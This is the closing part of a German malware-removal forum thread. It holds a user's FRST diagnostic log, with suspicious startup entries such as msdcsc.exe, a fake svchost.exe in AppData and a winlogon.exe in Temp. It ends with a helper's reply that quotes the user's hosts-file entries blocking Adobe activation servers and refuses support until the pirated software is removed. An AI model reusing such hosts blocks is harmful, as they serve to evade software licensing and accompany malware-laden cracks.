MSCONFIG\startupfolder: C:^Users^AweZome^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^PricePeepUpdater.lnk => C:\Windows\pss\PricePeepUpdater.lnk.Startup
MSCONFIG\startupfolder: C:^Users^AweZome^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Rainmeter.lnk => C:\Windows\pss\Rainmeter.lnk.Startup
MSCONFIG\startupfolder: C:^Users^AweZome^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^VersaVPN.lnk => C:\Windows\pss\VersaVPN.lnk.Startup
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5.5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5.5ServiceManager\CS5.5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\AweZome\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CQX Start =>
MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Kepard => "C:\Program Files (x86)\Kepard\Kepard.exe" tray
MSCONFIG\startupreg: KeyScrambler => C:\Program Files (x86)\KeyScrambler\keyscrambler.exe /a
MSCONFIG\startupreg: LogMeIn Hamachi Ui => "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
MSCONFIG\startupreg: lollipop => "c:\users\awezome\appdata\local\lollipop\lollipop.exe" lollipop
MSCONFIG\startupreg: MacrokeyManager => WTMKM.exe
MSCONFIG\startupreg: MicroUpdate => C:\Users\AweZome\Documents\MSDCSC\msdcsc.exe
MSCONFIG\startupreg: puush => C:\Program Files (x86)\puush\puush.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RGSC => D:\GTA IV\Rockstar Games Social Club\RGSCLauncher.exe /silent
MSCONFIG\startupreg: SandboxieControl => "C:\Program Files\Sandboxie\SbieCtrl.exe"
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: svchost.exe => C:\Users\AweZome\AppData\Roaming\Microsoft\svchost.exe
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: Vidalia => "C:\Program Files (x86)\Vidalia Bridge Bundle\Vidalia\vidalia.exe"
MSCONFIG\startupreg: winlogon => C:\Users\AweZome\AppData\Local\Temp\winlogon.exe
MSCONFIG\startupreg: Xvid => C:\Program Files (x86)\Xvid\CheckUpdate.exe
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (03/07/2014 03:41:24 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/06/2014 07:49:45 PM) (Source: Application Hang) (User: )
Description: Programm FRST64.exe, Version 3.3.10.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: e70
Startzeit: 01cf396ca3203ee8
Endzeit: 0
Anwendungspfad: C:\Users\AweZome\Downloads\FRST64.exe
Berichts-ID:
Error: (03/06/2014 04:41:14 PM) (Source: Steam Client Service) (User: )
Description: Error: Failed to poke open firewall
Error: (03/06/2014 04:04:59 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/05/2014 05:00:32 PM) (Source: Steam Client Service) (User: )
Description: Error: Failed to poke open firewall
Error: (03/05/2014 04:43:06 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/04/2014 06:12:55 PM) (Source: Steam Client Service) (User: )
Description: Error: Failed to poke open firewall
Error: (03/04/2014 02:11:42 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/03/2014 07:54:32 PM) (Source: MsiInstaller) (User: AzeX)
Description: Produkt: Vegas Pro 12.0 (64-bit) -- Vegas Pro 12.0 (64-bit) must be installed from DVD or the downloaded installer.
Error: (03/03/2014 03:34:42 PM) (Source: Steam Client Service) (User: )
Description: Error: Failed to poke open firewall
System errors:
=============
Error: (03/07/2014 03:39:56 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Routing und RAS" ist vom Dienst "RAS-Verbindungsverwaltung" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1068
Error: (03/07/2014 03:39:56 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "RAS-Verbindungsverwaltung" ist vom Dienst "Telefonie" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1058
Error: (03/06/2014 04:03:28 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Routing und RAS" ist vom Dienst "RAS-Verbindungsverwaltung" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1068
Error: (03/06/2014 04:03:28 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "RAS-Verbindungsverwaltung" ist vom Dienst "Telefonie" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1058
Error: (03/05/2014 04:41:37 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Routing und RAS" ist vom Dienst "RAS-Verbindungsverwaltung" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1068
Error: (03/05/2014 04:41:37 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "RAS-Verbindungsverwaltung" ist vom Dienst "Telefonie" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1058
Error: (03/04/2014 02:10:13 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Routing und RAS" ist vom Dienst "RAS-Verbindungsverwaltung" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1068
Error: (03/04/2014 02:10:13 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "RAS-Verbindungsverwaltung" ist vom Dienst "Telefonie" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1058
Error: (03/03/2014 02:07:17 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Routing und RAS" ist vom Dienst "RAS-Verbindungsverwaltung" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1068
Error: (03/03/2014 02:07:17 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "RAS-Verbindungsverwaltung" ist vom Dienst "Telefonie" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
%%1058
Microsoft Office Sessions:
=========================
Error: (03/07/2014 03:41:24 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/06/2014 07:49:45 PM) (Source: Application Hang)(User: )
Description: FRST64.exe3.3.10.2e7001cf396ca3203ee80C:\Users\AweZome\Downloads\FRST64.exe
Error: (03/06/2014 04:41:14 PM) (Source: Steam Client Service)(User: )
Description: Failed to poke open firewall
Error: (03/06/2014 04:04:59 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/05/2014 05:00:32 PM) (Source: Steam Client Service)(User: )
Description: Failed to poke open firewall
Error: (03/05/2014 04:43:06 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/04/2014 06:12:55 PM) (Source: Steam Client Service)(User: )
Description: Failed to poke open firewall
Error: (03/04/2014 02:11:42 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (03/03/2014 07:54:32 PM) (Source: MsiInstaller)(User: AzeX)
Description: Produkt: Vegas Pro 12.0 (64-bit) -- Vegas Pro 12.0 (64-bit) must be installed from DVD or the downloaded installer.(NULL)(NULL)(NULL)(NULL)(NULL)
Error: (03/03/2014 03:34:42 PM) (Source: Steam Client Service)(User: )
Description: Failed to poke open firewall
CodeIntegrity Errors:
===================================
Date: 2013-10-07 21:53:38.525
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-07 21:53:38.494
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-07 21:53:26.519
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-07 21:53:26.488
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-07 16:52:49.589
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-07 16:52:49.573
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-07 16:52:45.532
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-07 16:52:45.512
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-06 16:44:05.246
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2013-10-06 16:44:05.230
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
==================== Memory info ===========================
Percentage of memory in use: 15%
Total physical RAM: 15613.55 MB
Available physical RAM: 13123.74 MB
Total Pagefile: 31225.29 MB
Available Pagefile: 28540.83 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:346.58 GB) (Free:115.73 GB) NTFS
Drive d: () (Fixed) (Total:584.83 GB) (Free:206.9 GB) NTFS
Drive f: (Elements) (Fixed) (Total:1397.26 GB) (Free:631 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 932 GB) (Disk ID: 7A66CBEA)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=347 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=585 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 1397 GB) (Disk ID: 0002A991)
Partition 1: (Not Active) - (Size=-698724909056) - (Type=07 NTFS)
==================== End Of Log ============================
|
|
07.03.2014, 16:29
| #4 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | Java Drive By Virenscanner Logs fehlen Code:
ATTFilter 127.0.0.1 ood.opsource.net ereg.wip4.adobe.com ereg.wip.adobe.com activate-sjc0.adobe.com practivate.adobe.ipp activate.wip4.adobe.com 3dns-1.adobe.com activate.wip1.adobe.com 3dns.adobe.com
127.0.0.1 practivate.adobe.ntp activate.wip.adobe.com wip1.adobe.com 3dns-4.adobe.com activate.wip2.adobe.com practivate.adobe 3dns-2.adobe.com www.wip4.adobe.com 3dns-3.adobe.com
127.0.0.1 crl.verisign.net adobe-dns-4.adobe.com adobe-dns-1.adobe.com adobe-dns.adobe.com ereg.adobe.com wip4.adobe.com lm.licenses.adobe.com wip3.adobe.com na2m-pr.licenses.adobe.com
127.0.0.1 www.wip1.adobe.com adobeereg.com lmlicenses.wip4.adobe.com www.wip2.adobe.com ereg.wip2.adobe.com www.wip.adobe.com wip2.adobe.com practivate.adobe.newoa wwis-dubc1-vip60.adobe.com
127.0.0.1 wip.adobe.com adobe-dns-3.adobe.com www.adobeereg.com practivate.adobe.com activate-sea.adobe.com activate.wip3.adobe.com activate.adobe.com adobe-dns-2.adobe.com www.wip3.adobe.com
127.0.0.1 hl2rcv.adobe.com ereg.wip3.adobe.com ereg.wip1.adobe.com
Schonmal davon gehört, dass mit Cracks und Keygens im Wesentlichen Malware verteilt wird? Mal abgesehen davon, dass dieses Zeug illegal ist?  Bitte lesen => http://www.trojaner-board.de/95393-c...-software.html Es geht weiter wenn du alles Illegale entfernt hast. Bei wiederholten Crack/Keygen Verstößen behalte ich es mir vor, den Support einzustellen, d.h. Hilfe nur noch bei der Datensicherung und Neuinstallation des Betriebssystems.
__________________ Logfiles bitte immer in CODE-Tags posten  |
|
| Themen zu Java Drive By |
| aufsetzen, auszug, dokumente, drive, durchs, festplatte, formatierung, html, java, java drive by, javascript, komplett, konnte, kumpel, kurzem, neu, nichts, platte, problem, svchost.exe, system, trotz, vbscript, virus, wahrscheinlich, wenig |
Linear-Darstellung
